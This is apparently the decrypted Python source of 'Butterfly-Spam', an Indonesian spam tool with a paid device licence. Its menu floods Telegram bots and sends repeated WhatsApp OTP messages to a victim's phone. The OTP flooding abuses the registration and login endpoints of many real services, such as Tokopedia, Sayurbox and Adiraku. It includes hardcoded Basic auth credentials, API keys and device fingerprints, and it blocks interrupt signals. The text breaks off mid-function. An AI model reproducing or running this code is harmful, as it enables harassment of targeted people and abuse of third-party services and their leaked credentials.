# DECRYPTED CODE FROM BUTTERFLY-SPAM
# Generated by decryption script

import os
import sys
import signal
import subprocess
import time
import random
import string
import threading
import re
import smtplib
import urllib3
import certifi
import requests

from datetime import datetime
from io import BytesIO
from concurrent.futures import ThreadPoolExecutor, as_completed
from PIL import Image
from bs4 import BeautifulSoup
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from rich.console import Console
from rich.panel import Panel
from rich.columns import Columns
from rich import print as printf

# === FUNCTIONS ===

def blokir_signal():
    return

# Signal handlers
signal.signal(signal.SIGINT, blokir_signal)
signal.signal(signal.SIGTSTP, blokir_signal)

# Color codes
a = '\x1b[1;30m'
m = '\x1b[1;31m'
h = '\x1b[1;32m'
k = '\x1b[1;33m'
c = '\x1b[1;36m'
p = '\x1b[1;37m'
bg_p = '\x1b[107m'
r = '\x1b[0m'

# API Configuration
BIN_ID = '69533bc2ae596e708fb92d2d'
API_KEY = '$2a$10$LsT4tIPe8mzNhB74ymSf/.G/SqgviqZwe6tqu8Uvk/gdE5wDQ1fEy'
JSONBIN_URL = f'https://api.jsonbin.io/v3/b/{BIN_ID}/latest'

# Global user data
USER_DATA = {'id_device': '', 'masa_aktif': ''}

def bersihkan():
    os.system('cls' if os.name == 'nt' else 'clear')

def sembunyikan_cursor():
    sys.stdout.write('\x1b[?25l')
    sys.stdout.flush()

def tampilkan_cursor():
    sys.stdout.write('\x1b[?25h')
    sys.stdout.flush()

def get_device_id():
    try:
        result = subprocess.run(['whoami'], capture_output=True, text=True)
        device_id = result.stdout.strip()
        return device_id
    except Exception as e:
        print(f' {p}[{m}!{p}] Error mendapatkan device ID {m}:{h} {e}{r}')
        return None

def check_expiry_date(expiry_date_str):
    try:
        expiry_date = datetime.strptime(expiry_date_str, '%Y-%m-%d')
        today = datetime.now()
        remaining_days = (expiry_date - today).days
        
        if remaining_days < 0:
            return (False, 0)
        
        return (True, remaining_days)
    except Exception as e:
        print(f' {p}[{m}!{p}] Error parsing tanggal{m} :{h} {e}{r}')
        return (False, 0)

def check_device_auth():
    device_id = get_device_id()
    
    if not device_id:
        print(f'\n {p}[{m}!{p}] Tidak dapat membaca device ID{r}')
        time.sleep(2)
        return False
    
    headers = {'X-Master-Key': API_KEY}
    
    try:
        response = requests.get(JSONBIN_URL, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            users = data['record']
            
            user_found = None
            for user in users:
                if user['id_device'] == device_id:
                    user_found = user
                    break
            
            if user_found:
                is_valid, remaining_days = check_expiry_date(user_found['masa_aktif'])
                
                if is_valid:
                    USER_DATA['id_device'] = user_found['id_device']
                    USER_DATA['masa_aktif'] = user_found['masa_aktif']
                    return True
                
                show_auth_banner()
                print(f' {p}[{m}!{p}] Device ID    {m}: {p}{device_id}{r}')
                print(f' {p}[{m}!{p}] Masa Aktif   {m}: {p}{user_found["masa_aktif"]}{r}')
                print(f' {p}[{m}!{p}] Status       {m}: {p}Sudah Tidak Berlaku{r}\n')
                print(f' {p}[{m}!{p}] Hubungi Admin Untuk Perpanjang Masa Aktif')
                return False
            else:
                show_auth_banner()
                print(f' {p}[{m}!{p}] Device ID    : {m}{device_id}{r}')
                print(f' {p}[{m}!{p}] Status       : {m}Anomali Gak Di Ajak{r}\n')
                print(f' {p}[{m}!{p}] Silahkan Daftar Ke Admin Terlebih Dahulu')
                time.sleep(3)
                return False
        else:
            print(f' {p}[{m}!{p}] Error koneksi ke server{m} :{h} {response.status_code}{r}')
            return False
            
    except requests.exceptions.Timeout:
        print(f' {p}[{m}!{p}] Timeout{m} :{h} Tidak dapat terhubung ke server{r}')
        time.sleep(2)
        return False
        
    except requests.exceptions.ConnectionError:
        print(f' {p}[{m}!{p}] Tidak ada koneksi internet{r}')
        time.sleep(2)
        return False
        
    except Exception as e:
        print(f' {p}[{m}!{p}] Error {m}:{h} {e}{r}')
        time.sleep(2)
        return False

def show_auth_banner():
    bersihkan()
    print(f'\n{p}╭──────────────────────────────────────────────────╮\n│         {m}  ╔═╗╦ ╦╔╦╗╦ ╦   ╦  ╔═╗╔═╗╦╔╗╔           {p}│\n│         {m}  ╠═╣║ ║ ║ ╠═╣───║  ║ ║║ ╦║║║║           {p}│\n│         {p}  ╩ ╩╚═╝ ╩ ╩ ╩   ╩═╝╚═╝╚═╝╩╝╚╝           {p}│\n│ {p}Authentication Login Tools Butterfly-Spam Byexe! {p}│\n╰──────────────────────────────────────────────────╯\n')

# Menu list
daftar_menu = [
    {'text': 'Spam Bot Telegram', 'indent': 0},
    {'text': 'Spam OTP Whatsapp', 'indent': 0},
    {'text': 'Spam Gmail Brutal', 'indent': 0},
    {'text': 'Spam Gmail Slowly', 'indent': 0},
    {'text': 'Spam NGL Brutalty', 'indent': 0},
    {'text': 'Spam Calls Not WA', 'indent': 0},
    {'text': 'Chat Admin!', 'indent': 3},
    {'text': 'Exit!', 'indent': 6}
]

def tampilkan_menu(pilihan_sekarang):
    bersihkan()
    sembunyikan_cursor()
    
    print(''.join([
        '\n ',
        m, ' ⣠⣤⣤⡤⠤⢤⣤⣀⡀', p, '⠀⠐⠒⡄⠀⡠⠒⠀', m, '⠀⢀⣀⣤⠤⠤⣤⣤⣤⡄', p,
        '\n ', m, '⠈⠻⣿⡤⠤⡏', p, '⠀⠉⠙⠲⣄⠀⢰⢠⠃⢀⡤⠞⠋⠉⠈', m, '⢹⠤⢼⣿⠏', p, ' ╔╗ ┬ ┬┌┬┐┌┬┐┌─┐┬─┐┌─┐┬ ┬ ┬\n ',
        m, '⠀⠀⠘⣿⡅', p, '⠓⢒⡤⠤⠀⡈⠱⣄⣼⡴⠋⡀⠀⠤⢤⡒⠓', m, '⢬⣿⠃', p, '  ╠╩╗│ │ │  │ ├┤ ├┬┘├┤ │ └┬┘\n ',
        m, '⠀⠀⠀⠹⣿⣯⣐', p, '⢷⣀⣀⢤⡥⢾⣿⠷⢥⠤⣀⣀⣞', m, '⣢⣽⡿⠃', p, '   ╚═╝└─┘ ┴  ┴ └─┘┴└─└  ┴─┘┴\n ',
        m, '⠀⠀⠀⠀⠈⢙⣿', p, '⠝⠀⢁⠔⡨⡺⡿⡕⢔⠀⡈⠐⠹', m, '⣟⠋', p, '   ╔═╗┌─┐┌─┐┌┬┐\n ',
        m, '⠀⠀⠀⠀⠀⢼⣟', p, '⢦⢶⢅⠜⢰⠃⠀⢹⡌⢢⣸⠦⠴', m, '⣿⡇', p, '   ╚═╗├─┘├─┤│││\n ',
        m, '⠀⠀⠀⠀⠀⠘⣿⣇', p, '⡬⡌⢀⡟⠀⠀⠀⢷⠀⣧', m, '⢧⣵⣿⠂', p, '   ╚═╝┴  ┴ ┴┴ ┴\n ',
        m, '⠀⠀⠀⠀⠀⠀⠈⢻', p, '⠛⠋⠉⠀⠀⠀⠀⠈⠉⠙', m, '⢻⡏', p, '\n ',
        m, '⠀ ⠀ ⠀⠀⠀⡿', p, '⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀', m, '⣿', p, '  ByexeKW\n\n',
        a, '─────────────────────────────────────────────────\n'
    ]))
    
    for nomor, item in enumerate(daftar_menu):
        indent_space = ' ' * item['indent']
        text = item['text']
        
        if nomor == pilihan_sekarang:
            print(f'  {indent_space}{p}[{m}>{p}] {bg_p}{a}{text}{r} {p}[{m}<{p}]')
        else:
            print(f'  {indent_space}{p}[{m}>{p}] {text} {p}[{m}<{p}]')

def jalankan_file(nama_file):
    bersihkan()
    tampilkan_cursor()
    
    try:
        if os.path.exists(nama_file):
            subprocess.run([sys.executable, nama_file])
        else:
            print(f' {p}[{m}!{p}] Mana File {nama_file} Nya?{r}')
            time.sleep(2)
    except Exception:
        pass

def chat_admin():
    os.system('xdg-open https://wa.me/6283847035413')
    tampilkan_cursor()

def send_telegram_message(bot_token, chat_id, message):
    url = f'https://api.telegram.org/bot{bot_token}/sendMessage'
    payload = {'chat_id': chat_id, 'text': message, 'parse_mode': 'HTML'}
    
    try:
        response = requests.post(url, data=payload)
        result = response.json()
        return result.get('ok', False)
    except Exception:
        return False

def send_telegram_photo(bot_token, chat_id, photo_url, caption):
    url = f'https://api.telegram.org/bot{bot_token}/sendPhoto'
    payload = {'chat_id': chat_id, 'photo': photo_url, 'caption': caption, 'parse_mode': 'HTML'}
    
    try:
        response = requests.post(url, data=payload)
        result = response.json()
        return result.get('ok', False)
    except Exception:
        return False

def spam_bot_telegram_main():
    os.system('clear')
    
    # Banner display code omitted for brevity
    print(''.join([
        m,
        '\n╭───────────────────────────────────────────╮\n',
        m, '│   ', a, '⠀⠀⠀⠀⠀⢀⣤⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀', a, '⠀⠀⢰⡟⠁⠀⠈⢻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠶⠳⢶⣄⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀', a, '⠀⠀⠸⣧⡀⠀⢀⣼⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀⠀⣿⡆⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀', a, '⠀⠀⣿⢟⠿⣿⠋⠀⠀⠀⣀⣀⣤⣤⣤⣤⣤⣄⣀⡀⠀⠀⠀⠀⠀⠹⣷⣤⣠⣴⣿⠁⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀', a, '⠀⠀⣿⡘⢰⣧⣤⣶⠾⠟⢛⡉⠉⠉⠉⠉⠉⠉⢙⠛⠿⢶⣦⣄⠀⠀⠀⢹⡏⡏⣿⡄⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀', a, '⠀⠀⢸⣏⣧⣾⠟⣉⠔⠂⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⠐⠪⣙⠿⣦⡀⢸⡇⡇⣿⡇⠀⠀   ', m, '│\n',
        m, '│   ⠀', a, '⠀⠀⠀⣼⣿⠟⡡⠊⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠑⢬⡻⣾⡇⡇⢿⡇⠀⠀   ', m, '│\n',
        m, '│   ', a, '⠀⢀⣠⣴⣿⠿⠿⠿⠛⠛⠛⠛⠿⠿⠷⢶⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢾⡇⡇⢸⡇⠀⠀   ', m, '│\n',
        m, '│  ', a, ' ⢠⣿⢋⠥⠒⠈⠉⠀⠀⠀⠀⠀⠀⠈⠉⠑⠒⠢⠬⣉⡛⠿⢶⣤⡀⠀⠀⣠⣴⣶⣿⡇⡇⢸⣷⠀⠀   ', m, '│\n',
        m, '│   ', a, '⠈⢿⣷⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⠈⠉⠒⠬⡛⢷⣾⠟⡡⠒⣿⡇⡇⢸⣿⠀⠀   ', m, '│\n',
        m, '│  ', a, ' ⢠⣿⠃⠀⠉⠻⢷⣦⣤⣀⣀⣤⣶⡿⠟⠛⠉⠉⠉⠉⠛⣷⡄⠀⠀⣿⠏⡌⠀⢀⣿⣿⠿⢿⣿⣄⠀   ', m, '│\n',
        m, '│  ', a, ' ⢸⣿⠀⠀⠀⠀⠀⠀⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⡇⠀⢸⣿⢰⠀⢀⣾⠋⠀⠀⠀⠹⣿⡄   ', m, '│\n',
        m, '│  ', a, ' ⠈⣿⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠁⠀⢾⣿⠎⠀⢸⡇⠀⠀⠀⠀⠀⣿⡇   ', m, '│\n',
        m, '│   ', a, '⢰⣿⠟⣿⡿⠿⠷⠶⢶⣶⣶⣦⣤⣤⣴⣶⡶⠶⣾⡿⠏⠀⠀⠀⢸⣿⢰⠀⠈⢿⣄⠀⠀⠀⣰⣿⠁   ', m, '│\n',
        m, '│   ', a, '⠘⣿⣄⠀⠀⠉⠉⠉⠉⠁⠒⠒⠒⠒⠒⠂⠉⠉⠁⠀⠀⢀⣀⣠⡶⢿⣎⣇⠀⠈⠛⠿⢶⣿⠟⠁⠀   ', m, '│\n',
        m, '│   ⠀', a, '⠈⠛⢿⣶⣦⣤⣤⣄⣀⣀⣀⣀⣀⣠⣤⣤⡤⠶⠶⢟⡛⠩⠕⠊⠉⠻⣿⣦⣀⣀⣠⣾⠏⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀', a, '⠀⠻⣧⠠⠈⠉⠉⠉⠉⠉⠉⠁⠀⠤⠒⠒⠉⠁⠀⠀⠀⠀⠀⠀⠈⠙⢛⣿⡿⠃⠀⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀⠀', a, '⠀⠙⢷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⡿⠟⠀⠀⠀⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀⠀⠀⠀', a, '⠀⠛⠷⣦⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⡾⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀   ', m, '│\n',
        m, '│   ⠀⠀⠀⠀⠀⠀⠀⠀', a, '⠀⠈⠙⠛⠛⠷⠶⢶⣶⣶⣶⣶⠶⠾⠿⠛⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀', m, '│⠀\n',
        m, '│                                           ', m, '│\n',
        m, '│         ', a, '[', m, ' >', p, ' SPAM BOT TELEGRAM ', m, '<', a, ' ]         ', m, '│\n╰───────────────────────────────────────────╯\n'
    ]))
    
    BOT_TOKEN = input(f'\n{a}[{m}?{a}] {p}Masukkan Token Telegram Target {m}:{a} ').strip()
    CHAT_ID = input(f'{a}[{m}?{a}] {p}Masukkan Chat ID Target {m}:{a} ').strip()
    
    with_image = input(f'{a}[{m}?{a}] {p}Mau Spam Pakai Gambar? {a}({p}y{m}/{p}n{a}) {m}:{a} ').strip().lower()
    
    photo_url = None
    if with_image == 'y':
        photo_url = input(f'{a}[{m}?{a}] {p}Masukkan URL Gambar {m}:{a} ').strip()
    
    message = input(f'{a}[{m}?{a}] {p}Masukkan Isi Pesan {m}:{a} ').strip()
    
    try:
        count = int(input(f'{a}[{m}?{a}]{p} Masukkan Jumlah Spam{m} :{a} ').strip())
        
        if count > 0:
            input(f'\n{a}[{m}!{a}]{p} Mulai Spam Target{m}! {a}| \x1b[101m{h} ENTER {r}')
            
            success_count = 0
            failed_count = 0
            
            for i in range(1, count + 1):
                if with_image == 'y':
                    status = send_telegram_photo(BOT_TOKEN, CHAT_ID, photo_url, message)
                else:
                    status = send_telegram_message(BOT_TOKEN, CHAT_ID, message)
                
                if status:
                    print(f'🌐 {p}Status Pesan {m}:{a} Terkirim ✅')
                    success_count += 1
                else:
                    print(f'🌐 {p}Status Pesan {m}:{a} Gagal Bos')
                    failed_count += 1
                
                if i < count:
                    pass
            
            os.system('clear')
            print(f'\n{a}┌─[ {p}RINGKASAN PENGIRIMAN{a} ]\n{a}│\n{a}├─{m}➤ {p}Total Pesan  {m}:  {a}{count}\n{a}├─{m}➤ {p}Sukses       {m}:  {a}{k}{success_count}\n{a}└─{m}➤ {p}Gagal        {m}:  {a}{failed_count}\n')
            
            input(f'\n{a}[{m}!{a}]{p} Kembali Ke Butterfly-Spam{m} {a}| \x1b[101m{h} ENTER {r}')
        else:
            input(f'{a}[{m}!{a}]{p} Jumlah tidak boleh kosong{m}! {a}| \x1b[101m{h} ENTER {r}')
    
    except ValueError:
        input(f'{a}[{m}!{a}]{p} Angka Tidak Valid{m}! {a}| \x1b[101m{h} ENTER {r}')

def extract_value(text, start_marker, end_marker):
    try:
        start = text.find(start_marker)
        if start == -1:
            return None
        
        start += len(start_marker)
        end = text.find(end_marker, start)
        
        if end == -1:
            return None
        
        return text[start:end]
    except:
        return None

def spam_otp_codex(length):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def spam_otp_fetch_value(response, start, end):
    try:
        idx = response.find(start)
        if idx == -1:
            return None
        
        idx += len(start)
        tail = response[idx:]
        end_idx = tail.find(end)
        
        if end_idx == -1:
            return None
        
        return tail[:end_idx]
    except:
        return None

# Various OTP spam functions (abbreviated for space)
def spam_otp_bisatopup(nomor):
    try:
        dev = spam_otp_codex(16)
        url = f'https://api-mobile.bisatopup.co.id/register/send-verification?type=WA&device_id={dev}&version_name=6.12.04&version=61204'
        payload = f'phone_number={nomor}'
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        res = requests.post(url, data=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '"message":"', '","') == 'OTP akan segera dikirim ke perangkat'
    except:
        return False

def spam_otp_titipku(nomor):
    try:
        url = 'https://titipku.tech/v1/mobile/auth/otp?method=wa'
        payload = {'phone_number': f'+62{nomor}', 'message_placeholder': 'hehe'}
        headers = {'Content-Type': 'application/json'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '"message":"', '","') == 'otp sent'
    except:
        return False

def spam_otp_jogjakita(nomor):
    try:
        # Token request
        url_token = 'https://aci-user.bmsecure.id/oauth/token'
        payload_token = 'grant_type=client_credentials&uuid=00000000-0000-0000-0000-000000000000&id_user=0&id_kota=0&location=0.0%2C0.0&via=jogjakita_user&version_code=501&version_name=6.10.1'
        headers_token = {'Authorization': 'Basic OGVjMzFmODctOTYxYS00NTFmLThhOTUtNTBlMjJlZGQ2NTUyOjdlM2Y1YTdlLTViODYtNGUxNy04ODA0LWQ3NzgyNjRhZWEyZQ==', 'Content-Type': 'application/x-www-form-urlencoded'}
        res_tok = requests.post(url_token, data=payload_token, headers=headers_token, timeout=10)
        token = spam_otp_fetch_value(res_tok.text, '{"access_token":"', '","')
        
        if not token:
            return False
        
        # OTP request
        url_otp = 'https://aci-user.bmsecure.id/v2/user/signin-otp/wa/send'
        payload = {
            'phone_user': nomor,
            'primary_credential': '',
            'uuid': '00000000-4c22-250d-3006-9a465f072739',
            'version_code': '501',
            'version_name': '6.10.1',
            'via': 'jogjakita_user',
            'device_id': '',
            'fcm_token': '',
            'id_kota': 0,
            'id_user': 0,
            'location': '0.0,0.0'
        }
        headers_otp = {'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'}
        res = requests.post(url_otp, json=payload, headers=headers_otp, timeout=10)
        return spam_otp_fetch_value(res.text, '{"rc":', '","') == '200'
    except:
        return False

def spam_otp_candireload(nomor):
    try:
        url = 'https://app.candireload.com/apps/v8/users/req_otp_register_wa'
        payload = {'uuid': 'b787045b140c631f', 'phone': nomor}
        headers = {'Content-Type': 'application/json', 'irsauth': 'c6738e934fd7ed1db55322e423d81a66'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '{"success":', '","') == 'true'
    except:
        return False

def spam_otp_speedcash(nomor):
    try:
        # Token request
        url_token = 'https://sofia.bmsecure.id/central-api/oauth/token'
        headers_token = {'Authorization': 'Basic NGFiYmZkNWQtZGNkYS00OTZlLWJiNjEtYWMzNzc1MTdjMGJmOjNjNjZmNTZiLWQwYWItNDlmMC04NTc1LTY1Njg1NjAyZTI5Yg==', 'Content-Type': 'application/x-www-form-urlencoded'}
        res_tok = requests.post(url_token, data='grant_type=client_credentials', headers=headers_token, timeout=10)
        token = spam_otp_fetch_value(res_tok.text, 'access_token":"', '","')
        
        if not token:
            return False
        
        uuid = spam_otp_codex(8)
        url_otp = 'https://sofia.bmsecure.id/central-api/sc-api/otp/generate'
        payload = {
            'version_name': '6.2.1 (428)',
            'phone': nomor,
            'appid': 'SPEEDCASH',
            'version_code': 428,
            'location': '0,0',
            'state': 'REGISTER',
            'type': 'WA',
            'app_id': 'SPEEDCASH',
            'uuid': f'00000000-4c22-250d-ffff-ffff{uuid}',
            'via': 'BB ANDROID'
        }
        headers_otp = {'Authorization': f'Bearer {token}', 'Content-Type': 'application/json'}
        res = requests.post(url_otp, json=payload, headers=headers_otp, timeout=10)
        return spam_otp_fetch_value(res.text, '"rc":"', '","') == '00'
    except:
        return False

def spam_otp_kerbel(nomor):
    try:
        url = 'https://keranjangbelanja.co.id/api/v1/user/otp'
        boundary = '--dio-boundary-0879576676'
        payload = f'{boundary}\r\ncontent-disposition: form-data; name="phone"\r\n\r\n{nomor}\r\n{boundary}\r\ncontent-disposition: form-data; name="otp"\r\n\r\n118872\r\n{boundary}--'
        headers = {'content-type': f'multipart/form-data; boundary={boundary}'}
        res = requests.post(url, data=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '"result":"', '","') == 'OTP Berhasil Dikirimkan'
    except:
        return False

def spam_otp_mitradelta(nomor):
    try:
        url = f'https://irsx.mitradeltapulsa.com:8080/appirsx/appapi.dll/otpreg?phone={nomor}'
        res = requests.get(url, timeout=10)
        return spam_otp_fetch_value(res.text, '{"success":', '","') == 'true'
    except:
        return False

def spam_otp_agenpayment(nomor):
    try:
        # Register
        url_reg = 'https://agenpayment-app.findig.id/api/v1/user/register'
        payload_reg = {
            'name': 'AAD',
            'phone': nomor,
            'email': f'{nomor}@gmail.com',
            'pin': '1111',
            'id_propinsi': '5e5005024d44ff5409347111',
            'id_kabupaten': '5e614009360fed7c1263fdf6',
            'id_kecamatan': '5e614059360fed7c12653764',
            'alamat': 'aceh',
            'nama_toko': 'QUARD',
            'alamat_toko': 'aceh'
        }
        headers = {'content-type': 'application/json; charset=utf-8', 'merchantcode': '63d22a4041d6a5bc8bfdb3be'}
        res_reg = requests.post(url_reg, json=payload_reg, headers=headers, timeout=10)
        
        if spam_otp_fetch_value(res_reg.text, '{"status":', '","') != '200':
            return False
        
        # Login
        url_login = 'https://agenpayment-app.findig.id/api/v1/user/login'
        payload_login = {'phone': nomor, 'pin': '1111'}
        res_login = requests.post(url_login, json=payload_login, headers=headers, timeout=10)
        vid = spam_otp_fetch_value(res_login.text, 'validate_id":"', '",')
        
        if not vid:
            return False
        
        # Send OTP
        url_otp = 'https://agenpayment-app.findig.id/api/v1/user/login/send-otp'
        payload_otp = {'codeLength': 4, 'validate_id': vid, 'type': 'whatsapp'}
        res = requests.post(url_otp, json=payload_otp, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '{"status":', '","') == '200'
    except:
        return False

def spam_otp_z4reload(nomor):
    try:
        url = 'https://api.irmastore.id/apps/otp/v2/sendotpwa'
        payload = {'hp': nomor, 'uuid': 'MyT2H1xFo2WHoMT5gjdo3W9woys1', 'app_code': 'z4reload'}
        headers = {'content-type': 'application/json', 'authorization': '7117c8f459a98282c2c576b519d0662f'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '{"success":', '","') == 'true'
    except:
        return False

def spam_otp_singa(nomor):
    try:
        url = 'https://api102.singa.id/new/login/sendWaOtp?versionName=2.4.8&versionCode=143&model=SM-G965N&systemVersion=9&platform=android&appsflyer_id='
        payload = {'mobile_phone': nomor, 'type': 'mobile', 'is_switchable': 1}
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '"msg":"', '","') == 'Success'
    except:
        return False

def spam_otp_ktakilat(nomor):
    try:
        url = 'https://api.pendanaan.com/kta/api/v1/user/commonSendWaSmsCode'
        payload = {'mobileNo': nomor, 'smsType': 1}
        headers = {'Content-Type': 'application/json; charset=UTF-8', 'Device-Info': 'eyJhZENoYW5uZWwiOiJvcmdhbmljIiwiYWRJZCI6IjE1NDk3YTliLTI2NjktNDJjZi1hZDEwLWQwZDBkOGY1MGFkMCIsImFuZHJvaWRJZCI6ImI3ODcwNDViMTQwYzYzMWYiLCJhcHBOYW1lIjoiS3RhS2lsYXQiLCJhcHBWZXJzaW9uIjoiNS4yLjYiLCJjb3VudHJ5Q29kZSI6IklEIiwiY291bnRyeU5hbWUiOiJJbmRvbmVzaWEiLCJjcHVDb3JlcyI6NCwiZGVsaXZlcnlQbGF0Zm9ybSI6Imdvb2dsZSBwbGF5IiwiZGV2aWNlTm8iOiJiNzg3MDQ1YjE0MGM2MzFmIiwiaW1laSI6IiIsImltc2kiOiIiLCJtYWMiOiIwMDpkYjozNDozYjplNTo2NyIsIm1lbW9yeVRvdGFsIjo0MTM3OTcxNzEyLCJwYWNrYWdlTmFtZSI6ImNvbS5rdGFraWxhdC5sb2FuIiwicGhvbmVCcmFuZCI6InNhbXN1bmciLCJwaG9uZUJyYW5kTW9kZWwiOiJTTS1HOTY1TiIsInNkQ2FyZFRvdGFsIjozNTEzOTU5MjE5Miwic3lzdGVtUGxhdGZvcm0iOiJhbmRyb2lkIiwic3lzdGVtVmVyc2lvbiI6IjkiLCJ1dWlkIjoiYjc4NzA0NWIxNDBjNjMxZl9iNzg3MDQ1YjE0MGM2MzFmIn0='}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '"msg":"', '","') == 'success'
    except:
        return False

def spam_otp_uangme(nomor):
    try:
        aid = f'gaid_15497a9b-2669-42cf-ad10-{spam_otp_codex(12)}'
        url = f'https://api.uangme.com/api/v2/sms_code?phone={nomor}&scene_type=login&send_type=wp'
        headers = {
            'aid': aid,
            'android_id': 'b787045b140c631f',
            'app_version': '300504',
            'brand': 'samsung',
            'carrier': '00',
            'Content-Type': 'application/x-www-form-urlencoded',
            'country': '510',
            'dfp': '6F95F26E1EEBEC8A1FE4BE741D826AB0',
            'fcm_reg_id': 'frHvK61jS-ekpp6SIG46da:APA91bEzq2XwRVb6Nth9hEsgpH8JGDxynt5LyYEoDthLGHL-kC4_fQYEx0wZqkFxKvHFA1gfRVSZpIDGBDP763E8AhgRjDV7kKjnL-Mi4zH2QDJlsrzuMRo',
            'gaid': 'gaid_15497a9b-2669-42cf-ad10-d0d0d8f50ad0',
            'lan': 'in_ID',
            'model': 'SM-G965N',
            'ns': 'wifi',
            'os': '1',
            'timestamp': '1732178536',
            'tz': 'Asia%2FBangkok',
            'User-Agent': 'okhttp/3.12.1',
            'v': '1',
            'version': '28'
        }
        res = requests.get(url, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '{"code":"', '","') == '200'
    except:
        return False

def spam_otp_cairin(nomor):
    try:
        uuid = spam_otp_codex(32)
        url = 'https://app.cairin.id/v2/app/sms/sendWhatAPPOPT'
        payload = f'appVersion=3.0.4&phone={nomor}&userImei={uuid}'
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        res = requests.post(url, data=payload, headers=headers, timeout=10)
        return res.text == '{"code":"0"}'
    except:
        return False

def spam_otp_adiraku(nomor):
    try:
        url = 'https://prod.adiraku.co.id/ms-auth/auth/generate-otp-vdata'
        payload = {'mobileNumber': nomor, 'type': 'prospect-create', 'channel': 'whatsapp'}
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return spam_otp_fetch_value(res.text, '{"message":"', '","') == 'success'
    except:
        return False

def spam_otp_tokopedia(nomor):
    try:
        session = requests.Session()
        url_token = f'https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn={nomor}&ld=https%3A%2F%2Faccounts.tokopedia.com%2Fregister'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'}
        resp = session.get(url_token, headers=headers, timeout=10)
        
        token = re.search(r'<input\s+id="Token"\s+value="([^"]+)"', resp.text)
        if not token:
            return False
        
        url_otp = 'https://accounts.tokopedia.com/otp/c/ajax/request-wa'
        data = {
            'otp_type': '116',
            'msisdn': nomor,
            'tk': token.group(1),
            'email': '',
            'original_param': '',
            'user_id': '',
            'signature': '',
            'number_otp_digit': '6'
        }
        
        headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
        headers['X-Requested-With'] = 'XMLHttpRequest'
        
        resp2 = session.post(url_otp, data=data, headers=headers, timeout=10)
        return resp2.status_code == 200
    except:
        return False

def spam_otp_carsome(nomor):
    try:
        url = 'https://www.carsome.id/website/login/sendSMS'
        payload = {'username': nomor, 'optType': 1}
        headers = {'Content-Type': 'application/json'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return res.status_code == 200
    except:
        return False

def spam_otp_misteraladin(nomor):
    try:
        if nomor.startswith('62'):
            nomor = nomor[2:]
        
        url = 'https://m.misteraladin.com/api/members/v2/otp/request'
        payload = {'phone_number_country_code': '62', 'phone_number': nomor, 'type': 'register'}
        headers = {'Content-Type': 'application/json'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return res.status_code == 200
    except:
        return False

def spam_otp_sayurbox(nomor):
    try:
        url = 'https://www.sayurbox.com/graphql/v1?deduplicate=1'
        query = """
        mutation generateOTP($destinationType: String!, $identity: String!) {
            generateOTP(destinationType: $destinationType, identity: $identity) {
                id
                __typename
            }
        }
        """
        
        if nomor.startswith('62'):
            identity = f'+{nomor}'
        else:
            identity = f'+62{nomor}'
        
        payload = {
            'operationName': 'generateOTP',
            'variables': {'destinationType': 'whatsapp', 'identity': identity},
            'query': query
        }
        
        headers = {'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'}
        res = requests.post(url, json=payload, headers=headers, timeout=10)
        return '"id":' in res.text
    except:
        return False

def api_kickavenue_wa(nomor):
    try:
